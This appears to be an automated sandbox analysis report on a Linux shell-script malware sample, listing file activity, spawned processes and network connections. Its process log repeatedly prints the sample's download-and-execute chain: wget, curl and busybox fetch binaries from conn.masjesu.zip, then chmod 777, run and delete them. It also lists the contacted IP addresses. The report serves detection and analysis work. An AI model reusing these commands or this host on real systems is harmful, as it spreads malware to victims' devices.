File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /usr/bin/curl N/A
File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /usr/bin/curl N/A
File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /usr/bin/curl N/A
File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /usr/bin/curl N/A
File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /usr/bin/curl N/A
File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /usr/bin/curl N/A
File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /usr/bin/curl N/A
File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /usr/bin/curl N/A
File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /usr/bin/curl N/A
File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /usr/bin/curl N/A
File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /usr/bin/curl N/A
File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /usr/bin/curl N/A
File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /usr/bin/curl N/A
File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /usr/bin/curl N/A
File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /usr/bin/curl N/A
File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /usr/bin/curl N/A
File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /usr/bin/curl N/A
File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /usr/bin/curl N/A
File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /usr/bin/curl N/A
File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /usr/bin/curl N/A
File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /usr/bin/curl N/A
File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /usr/bin/curl N/A
File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /usr/bin/curl N/A
File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /usr/bin/curl N/A
File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /usr/bin/curl N/A
File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /usr/bin/curl N/A
File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /usr/bin/curl N/A
File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /usr/bin/curl N/A

Processes

/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/chmod

[chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH

[./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/rm

[rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/chmod

[chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h

[./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/rm

[rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/chmod

[chmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM

[./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/rm

[rm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/chmod

[chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd

[./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/rm

[rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/chmod

[chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM

[./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/rm

[rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/chmod

[chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI

[./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/rm

[rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/chmod

[chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG

[./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/rm

[rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/chmod

[chmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B

[./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/rm

[rm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/chmod

[chmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg

[./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/rm

[rm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/chmod

[chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj

[./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/rm

[rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/chmod

[chmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy

[./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/rm

[rm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/chmod

[chmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc

[./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/rm

[rm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/bin/chmod

[chmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5

[./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/bin/rm

[rm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/bin/chmod

[chmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw

[./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/bin/rm

[rm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/chmod

[chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd

[./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/rm

[rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/chmod

[chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM

[./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/rm

[rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/chmod

[chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI

[./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/rm

[rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/chmod

[chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG

[./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/rm

[rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/chmod

[chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj

[./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/rm

[rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/chmod

[chmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy

[./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/rm

[rm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/chmod

[chmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc

[./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/rm

[rm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/bin/chmod

[chmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5

[./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/bin/rm

[rm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/chmod

[chmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B

[./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/rm

[rm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/chmod

[chmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg

[./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/rm

[rm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/bin/chmod

[chmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw

[./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/bin/rm

[rm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/chmod

[chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH

[./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/rm

[rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/chmod

[chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h

[./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/rm

[rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/chmod

[chmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM

[./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/rm

[rm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
